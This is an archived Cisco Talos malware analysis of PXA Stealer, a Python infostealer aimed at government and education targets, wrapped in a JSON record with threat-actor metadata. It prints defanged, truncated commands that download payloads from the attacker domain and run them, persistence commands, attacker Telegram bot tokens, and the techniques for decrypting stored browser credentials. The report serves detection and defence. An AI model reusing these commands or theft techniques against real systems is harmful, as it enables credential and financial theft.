{ "id": "2e97618e-59ed-493b-8914-245857fab7fa", "created_at": "2026-04-06T00:22:21.767399Z", "updated_at": "2026-04-10T03:36:47.633673Z", "deleted_at": null, "sha1_hash": "64e16f591b24f7e10e085aa69fa0ef345daf2e37", "title": "New PXA Stealer targets government and education sectors for sensitive information", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4746736, "plain_text": "New PXA Stealer targets government and education sectors for\r\nsensitive information\r\nBy Joey Chen\r\nPublished: 2024-11-14 · Archived: 2026-04-05 16:45:40 UTC\r\nThursday, November 14, 2024 06:00\r\nCisco Talos discovered a new information stealing campaign operated by a Vietnamese-speaking threat\r\nactor targeting government and education entities in Europe and Asia.  \r\nWe discovered a new Python program called PXA Stealer that targets victims’ sensitive information,\r\nincluding credentials for various online accounts, VPN and FTP clients, financial information, browser\r\ncookies, and data from gaming software. \r\nPXA Stealer has the capability to decrypt the victim’s browser master password and uses it to steal the\r\nstored credentials of various online accounts.  \r\nThe attacker has used complex obfuscation techniques for the batch scripts used in this campaign. \r\nWe discovered the attacker selling credentials and tools in the Telegram channel “Mua Bán Scan MINI,”\r\nwhich is where the CoralRaider adversary operates, but we are not sure if the attacker belongs to the\r\nCoralRaider threat group or another Vietnamese cybercrime group. \r\nVictimology and targeted information  \r\nThe attacker is targeting the education sector in India and government organizations in European countries,\r\nincluding Sweden and Denmark, based on Talos telemetry data.  \r\nThe attacker’s motive is to steal the victim’s information, including credentials for various online accounts,\r\nbrowser login data, cookies, autofill information, credit card details, data from various cryptocurrency online and\r\ndesktop wallets, data from installed VPN clients, gaming software accounts, chat messengers, password managers,\r\nand FTP clients.  \r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 1 of 22\n\nAttacker’s infrastructure \r\nTalos discovered that the attacker was hosting malicious scripts and the stealer program on a domain,\r\ntvdseo[.]com, in the directories “/file”, “/file/PXA/”, “/file/STC/”, and “/file/Adonis/”. The domain belongs to a\r\nVietnamese professional search engine optimization (SEO) service provider; however, we are not certain whether\r\nthe attacker has compromised the domain to host the malicious files or has subscribed to get legitimate access\r\nwhile still using it for their malicious purposes. \r\nWe found that the attacker is using the Telegram bot for exfiltrating victims’ data. Our analysis of the payload,\r\nPXA Stealer, disclosed a few Telegram bot tokens and the chat IDs – controlled by the attacker.  \r\nAttacker-controlled Telegram bot token  \r\n7545164691:AAEJ4E2f-4KZDZrLID8hSRSJmPmR1h-a2M4 \r\n7414494371:AAGgbY4XAvxTWFgAYiAj6OXVJOVrqgjdGVs \r\nAttacker-controlled Telegram chat IDs \r\n-1002174636072 \r\n-1002150158011 \r\n-4559798560 \r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 2 of 22\n\n-4577199885 \r\n-4575205410 \r\nAttacker’s underground activities \r\nWe identified attacker’s Telegram account “Lone None,” which was hardcoded in the PXA Stealer program and\r\nanalyzed various details of the account, including the icon of Vietnam’s national flag and a picture of the emblem\r\nfor Vietnam’s Ministry of Public Security, which aligns with our assessment that the attacker is of Vietnamese\r\norigin. Also, we found Vietnamese comments in the PXA Stealer program, which further strengthen our\r\nassessment.  \r\n \r\n \r\nThe attacker’s Telegram account has biography data that includes a link to a private antivirus checker website that\r\nallows users or buyers to assess the detection rate of a malware program. This website provides a platform for\r\npotential threat actors to evaluate the effectiveness and stealth capabilities of the malware before purchasing it,\r\nindicating a sophisticated level of service and professionalism in the threat actor's operations. \r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 3 of 22\n\nWe also discovered that the attacker is active in an underground Telegram channel, “Mua Bán Scan MINI,”\r\nmainly selling Facebook accounts, Zalo accounts, SIM cards, credentials, and money laundry data. Talos observed\r\nthat this Vietnamese actor is also seen in the Telegram group in which the CoralRaider actor operates. However,\r\nwe are not certain whether the actor is a member of the CoralRaider gang or another Vietnamese cybercrime\r\ngroup.  \r\nTalos discovered that the attacker is also promoting another underground Telegram channel, “Cú Black Ads –\r\nDropship,\" by sharing a few automation tools to manage large numbers of user accounts in their channel and\r\nconducting the exchanging or selling of information related to social media accounts, proxy services, and a batch\r\naccount creator tool.  \r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 4 of 22\n\nThe tools shared by the attacker in the group are automated utilities designed to manage several user accounts.\r\nThese tools include a Hotmail batch creation tool, an email mining tool, and a Hotmail cookie batch modification\r\ntool. The compressed packages provided by the threat actor often contain not only the executable files for these\r\ntools but also their source code, allowing users to modify them as needed.  \r\nHotmail batch creation tool from telegram channel.\r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 5 of 22\n\nHotmail cookie batch modification tool from telegram channel. \r\nWe found that the attacker is not sharing all the tools for free, and some of them require users to send a unique key\r\nback to the Telegram channel administrator for software activation. This process ensures that only those who have\r\nbeen vetted or have paid for the tool can access its full functionality.  We also discovered that these tools are\r\ndistributed on other websites, such as aehack[.]com, highlighting that they are selling the tools. Additionally, a\r\nYouTube channel exists that provides tutorials on how to use these tools, further facilitating their widespread use\r\nand demonstrating the organized efforts to market and instruct potential users on their application. \r\nInfection Chain\r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 6 of 22\n\nThe attacker gains initial access by sending a phishing email with a ZIP file attachment, according to our telemetry\r\ndata. The ZIP file contains a malicious loader executable file compiled in Rust language and a hidden folder called\r\nPhotos. The hidden folder has other recurring folders, such as Documents and Images, that contain obfuscated\r\nWindows batch scripts and a decoy PDF document. \r\nWhen a victim extracts the attachment ZIP file, the hidden folder and the malicious Rust loader executable are\r\ndropped onto the victim machine. When the malicious Rust loader executable is run by the victim, it loads and\r\nexecutes multiple obfuscated batch scripts that are in the dropped hidden folders.   \r\nWe deobfuscated the Windows batch scripts using CyberChef, with each step in the process being crucial and\r\nrequiring precise execution to achieve accurate deobfuscation. First, we employed regular expressions (regex) to\r\nfilter out random characters consisting of uppercase and lowercase letters (A to Z). These random strings ranged in\r\nlength from six to nine characters and were enclosed within “%” symbols. Next, we filtered out the “^” symbols\r\nand removed any remaining uppercase and lowercase letters (A to Z) as well as special characters “_,” /’(?),” “$,”\r\n“#,” and “[].”  Finally, we eliminated the “%” symbols and we were able to successfully deobfuscate the scripts\r\nand reveal their PowerShell commands. \r\nSnippet of the obfuscated batch script  Snippet of the deobfuscated batch script \r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 7 of 22\n\nThe batch scripts execute PowerShell commands simultaneously, performing the following activities on the victim\r\nmachine: \r\nOpens a decoy PDF document of a Glassdoor job application form. \r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 8 of 22\n\nDownloads a portable Python 3.10 package archive masquerading as “synaptics.zip”, which is hosted on\r\nthe attacker-controlled domain through the hardcoded URL “hxxps[://]tvdseo[.]com/file/synaptics[.]zip”,\r\nand saves it in the user profile’s temporary folder as well as in the public user’s folder with the random file\r\nnames and extracts them. \r\nC:\\WINDOWS\\system32\\cmd[.]exe /S /D /c echo [Net[.]ServicePointManager]::SecurityProtocol = [Net[.]Se\r\n \r\nC:\\WINDOWS\\system32\\cmd[.]exe /S /D /c echo [Net[.]ServicePointManager]::SecurityProtocol = [Net[.]Se\r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 9 of 22\n\nC:\\WINDOWS\\system32\\cmd[.]exe /S /D /c echo $dst = [System[.]IO[.]Path]::Combine([System[.]Environmen\r\n \r\nC:\\WINDOWS\\system32\\cmd[.]exe /S /D /c echo Add-Type -AssemblyName System[.]IO[.]Compression[.]FileSy\r\nThen, it creates and runs a Windows shortcut file with the file name “WindowsSecurity.lnk”, configuring a\r\nbase64-encoded command as a command line argument in the user profile’s temporary folder and\r\nconfigures the “Run” registry key with the path of the shortcut file to establish persistence. \r\nC:\\WINDOWS\\system32\\cmd[.]exe /S /D /c echo $s = $payload = import base64;exec(base64.b64decode('aW1w\r\n \r\nC:\\WINDOWS\\system32\\cmd[.]exe /S /D /c echo New-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\\r\nThe Windows shortcut file with a single-line Python script using a disguised portable Python executable\r\ndownloads a base64-encoded Python program from a remote server. The downloaded program contains\r\ninstructions to disable the antivirus programs on the victim’s machine.  \r\ncmd[.]exe /c start \"\" /min C:\\Users\\Public\\oZHyMUy4qk\\synaptics[.]exe -c \"import urllib[.]request;im\r\nNext, the batch script continues to execute another PowerShell command that downloads the PXA Stealer\r\nPython program and executes it with the masqueraded portable Python executable “synaptics.exe” on the\r\nvictim’s machine.  \r\ncmd[.]exe /c start /min C:\\Users\\Public\\oZHyMUy4qk\\synaptics[.]exe -c import urllib[.]request;import\r\nAnother batch script called “WindowsSecurity.bat” is dropped in the Windows startup folder of the\r\nvictim’s machine to establish persistence, which has the command to download and execute the PXA\r\nStealer Python program shown in the earlier paragraph.  \r\nPXA Stealer targets victims’ sensitive data \r\nPXA Stealer is a Python program that has extensive capabilities targeting a variety of data on the victim’s\r\nmachine.   \r\nWhen the PXA Stealer is executed, it kills a variety of processes from a hardcoded list, including endpoint\r\ndetection software, network capture and analysis process, VPN software, cryptocurrency wallet applications, file\r\ntransfer client applications, and web browser and instant messaging application processes by executing “task kill”\r\ncommands.  \r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 10 of 22\n\nDetection evasive function of PXA Stealer. \r\nThe stealer has the capability of decrypting the browser master key, which is a cryptographic key used by web\r\nbrowsers like Google Chrome and other Chromium-based browsers to protect sensitive information, including\r\nstored passwords, cookies, and other data in an encrypted form on the local system. The stealer accesses the\r\nmaster key file “Local State” located in the browser folder of the user’s profile directory, which contains the\r\ninformation of the encryption key used to encrypt the user data stored in the “Login Data” file, and decrypts it\r\nusing the “CryptUnprotectData” function. This allows the attacker to gain access to the stored credentials and\r\nother sensitive browser information.   \r\nBrowser master key decryption function of PXA Stealer. \r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 11 of 22\n\nThe stealer also attempts to decrypts the master key that is stored in the key4.db file. Key4.db is a database used\r\nby Firefox (and some other Mozilla-based browsers) to store encryption keys, particularly the master key that\r\nencrypts sensitive data, such as saved passwords. The “getKey” function of the stealer is designed to extract and\r\ndecrypt keys from the key4.db file using either AES or 3DES encryption methods, depending on the encryption\r\nused in the stored key. \r\nBrowser master key decryption function of PXA Stealer. \r\nThe stealer attempts to retrieve user profiles paths from the profiles.ini file of browser applications, including\r\nMozilla Firefox, Pale Moon, SeaMonkey, Waterfox, Mercury,  k-Melon, IceDragon, Cyberfox, and BlackHaw for\r\nfurther processing, such as extracting saved passwords or other user data. \r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 12 of 22\n\nThe stealer collects the victim’s login information from the browser’s login data file. The function\r\n“get_ch_login_data” of the stealer extracts login data, including URLs, usernames, and passwords, from the\r\ndatabase “login_db”, which stores login information. The extracted login information is formatted into a string\r\nthat includes the URL, username, decrypted password, browser, and profile.  \r\nFor each login entry in the browser login database, the function checks if the URL contains any important\r\nkeywords that are hardcoded in the stealer program, and if a match is found, the login information is saved in a\r\nseparate file named “Important_Logins.txt” located in the “Browsers Data” folder within the user’s profile\r\ntemporary directory. The function saves all the results to “All_Passwords.txt” in the “Browsers Data” folder for\r\nother login data found in the database. \r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 13 of 22\n\nLogin credentials stealer function of PXA Stealer. \r\nThe stealer executes another function, “get_ch_cookies”, to extract cookies from a specified browser's cookie\r\ndatabase, decrypt them, and save the results to a file. First, it checks if the cookies database file exists in the\r\nspecified profile directory and unlocks the cookies database file. The database file is then copied to the temporary\r\nfolder and is processed by executing an SQL query to retrieve cookie information, including host key, name, path,\r\nencrypted value, expiration time, secure flag, and HTTP-only flag from the cookies database file.  \r\nIf any Facebook cookies are found, they are concatenated to a single string called \"fb_formatted\", and it calls\r\nanother function, \"ADS_Checker()\", to check for ads based on the Facebook cookies, and the results are written to\r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 14 of 22\n\na file called \"Facebook_Cookies.txt”.  Any other cookie information is written to a text file named after the\r\nbrowser and the profile. Finally, the function removes the temporary cookie database file. \r\nBrowser cookies stealer function of PXA Stealer. \r\nIn another sample of the stealer, for the browsers Chrome, Chrome SxS, and Chrome(x86), it downloads and\r\nexecutes a cookie stealer JavaScript through the URL hxxps://tvdseo[.]com/file/PXA/Cookie_Ext.zip. The cookie\r\nstealer JavaScript connects to the Telegram bot with the token, and the chat ID hardcoded in the script collects the\r\ncookies and sends them to the attacker’s Telegram bot through the POST method.  \r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 15 of 22\n\nBrowser cookie stealer JavaScript.\r\nNext, the stealer targets the victim’s credit card information stored in the browser database “webappsstore.sqlite”.\r\nThe function extracts and decrypts saved credit card information from a browser's web data database. It checks if\r\nthe cards database file \"cards_db\" exists and copies them to the user’s profile temporary folder. It executes a SQL\r\nquery to retrieve credit card information including name on card, expiration month/year, encrypted card number,\r\nand date modified. Then it decrypts the encrypted card number using the function “decrypt_ch_value” with the\r\nhelp of the decrypted master key. It writes the cards’ information to a text file and names it after the browser and\r\nthe profile. Finally, it gets the count of credit card information that was found and deletes the temporary copy of\r\nthe “cards_db” file.  \r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 16 of 22\n\nCredit card data stealer function of PXA Stealer. \r\nThe stealer extracts and saves the autofill form data from a browser's database to a text file with the file name\r\nformat of “$browser_$profile.txt” in a folder called “AutoFills” in browser profile location.  \r\nAutofill data stealer function of PXA Stealer.\r\nThe stealer also extracts and validates Discord tokens stored in various browsers or Discord applications. It checks\r\nfor the stored encrypted Discord tokens in the different browser database files and also Discord-specific\r\napplications files of Discord, Discord Canary, Lightcord, and Discord PTB on the victim's machine by searching\r\nfor strings using regular expression \"r\"dQw4w9WgXcQ:[^.*\\['(.*)'\\].*$][^\\\"]*\")\". Once the encrypted tokens are\r\nfound, it decrypts them with the function “decrypt_dc_tokens()” using the extracted master key that was used to\r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 17 of 22\n\nencrypt the tokens from the \"Local State\" file. Then, it validates the decrypted Discord tokens to check if it is a\r\nlegitimate Discord token and stores it by associating it with the browser name. Besides searching for the encrypted\r\ntokens, the function also looks for unencrypted Discord tokens by searching strings that match the regular\r\nexpression pattern \"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}\" for standard tokens and \"mfa\\.[\\w-]{84}\" for multi-factor\r\nauthentication (MFA) tokens in \".log\" and \".ldb\" files in the levelDB directory of Discord applications or web\r\nbrowsers where the structured key-value data is stored in levelDB database format. \r\nDiscord token stealer function of PXA Stealer. \r\nThe stealer executes another function to extract the user information from the MinSoftware application database.\r\nIt searches for the database file \"db_maxcare.sqlite\" file on the victim machine folders, including Desktop,\r\nDocuments, Downloads, OneDrive and in the logical partitions with the drive letters \"D:\\\" and \"E:\\\". Once found,\r\nit executes a SQL query to search in the accounts table of the database file and extracts the following data: \r\nuid: User identifier. \r\npass: User's password. \r\nfa2: Two-factor authentication data. \r\nemail: The user's email address. \r\npassmail: The email password. \r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 18 of 22\n\ncookie1: Likely a session or authentication cookie. \r\ntoken: Likely an authentication token. \r\ninfo: Account information. \r\nMinSoftware application data stealer function of PXA Stealer. \r\nThe stealer also has the functionalities for interacting with Facebook Ads Manager and Graph API using a session\r\nauthenticated via cookies.  \r\nIt takes a Facebook cookie and parses it for the session information, such as “c_user”, and attempts to\r\naccess the token. \r\nRetrieves and formats the details about the user's ad accounts, such as account status, currency, balance,\r\nspend cap, and amount spent.  \r\nGets the list of the user's Facebook pages, including page name, link, likes, followers, and verification\r\nstatus. \r\nIt retrieves a list of groups with administrative users. \r\nIt extracts Business Manager IDs associated with the account and retrieves ad account information under\r\neach Business Manager. \r\nIt uses Facebook data to determine ad account limits for a Business Manager. \r\nIt extracts the token from Facebook mobile pages to facilitate authenticates requests. \r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 19 of 22\n\nFacebook data stealer function of PXA Stealer. \r\nAfter collecting the targeted victim's data, including the login data, browser cookies, autofill information, credit\r\ncard details, Facebook ads account data, cryptocurrency wallet data, Discord token details, and MinSoft\r\napplication data, the stealer creates a ZIP archive of all the files in the user profile’s temporary folder with the file\r\nname format \"CountryCode_Victim's public IP Computername.zip\", with a high compression level of value nine.  \r\nWhile creating the archive and navigating the targeted folders, the stealer excludes some of the directories,\r\nincluding user_data, emoji, tdummy, dumps, webview, update-cache, GPUCache, DawnCache, temp, Code Cache,\r\nand Cache. It also attempts to rename each file while adding them to the archive. The archive is exfiltrated to the\r\nactor’s Telegram bot. After exfiltrating the victim’s data, the stealer deletes the folders that contained the collected\r\nuser data.  \r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 20 of 22\n\nExfiltration function of PXA Stealer. \r\nCoverage \r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here. \r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks. \r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here. \r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat. \r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products. \r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 21 of 22\n\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here. \r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them. \r\nAdditional protection with context to your specific environment and threat data are available from the Firewall\r\nManagement Center. \r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork. \r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org. Snort SIDs for this threat are listed below: \r\nSnort2: 64217, 64204, 64216, 64215, 64214, 64213, 64212, 64211, 64210, 64209, 64208, 64207, 64206, 64205,\r\n64203 \r\nSnort3: 301057, 301063, 301062, 301061, 301060, 301059, 64217, 301058   \r\nClamAV detections are also available for this threat: \r\nWin.Loader.RustLoader-10036712-0 \r\nPy.Infostealer.PXAStealer-10036718-0 \r\nPy.Infostealer.PXAStealer-10036725-0 \r\nTxt.Tool.PXAStealerInstaller-10036719-0 \r\nTxt.Tool.PXAStealerInstaller-10036724-0 \r\nTxt.Tool.PXAStealerInstaller-10036724-0 \r\nLnk.Downloader.PXAStealer-10036720-0 \r\nJs.Infostealer.CookieStealer-10036722-0 \r\nIndicators of Compromise \r\nIOCs for this research can be found in our GitHub repository here. \r\nSource: https://blog.talosintelligence.com/new-pxa-stealer/\r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 22 of 22", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.talosintelligence.com/new-pxa-stealer/" ], "report_names": [ "new-pxa-stealer" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "6b8c5ea0-a654-4b5c-b817-9e67b115059e", "created_at": "2024-04-19T02:00:03.625955Z", "updated_at": "2026-04-10T02:00:03.616114Z", "deleted_at": null, "main_name": "CoralRaider", "aliases": [], "source_name": "MISPGALAXY:CoralRaider", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6a894c24-6f51-4863-9efb-7f1b3133c848", "created_at": "2024-06-20T02:02:10.260154Z", "updated_at": "2026-04-10T02:00:05.001393Z", "deleted_at": null, "main_name": "CoralRaider", "aliases": [], "source_name": "ETDA:CoralRaider", "tools": [ "AsyncRAT", "LOLBAS", "LOLBins", "Living off the Land", "Lumma Stealer", "LummaC2", "NetSupport", "NetSupport Manager", "NetSupport Manager RAT", "NetSupport RAT", "NetSupportManager RAT", "Rhadamanthys", "Rhadamanthys Stealer", "RotBot", "XClient" ], "source_id": "ETDA", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434941, "ts_updated_at": 1775792207, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/64e16f591b24f7e10e085aa69fa0ef345daf2e37.pdf", "text": "https://archive.orkl.eu/64e16f591b24f7e10e085aa69fa0ef345daf2e37.txt", "img": "https://archive.orkl.eu/64e16f591b24f7e10e085aa69fa0ef345daf2e37.jpg" } }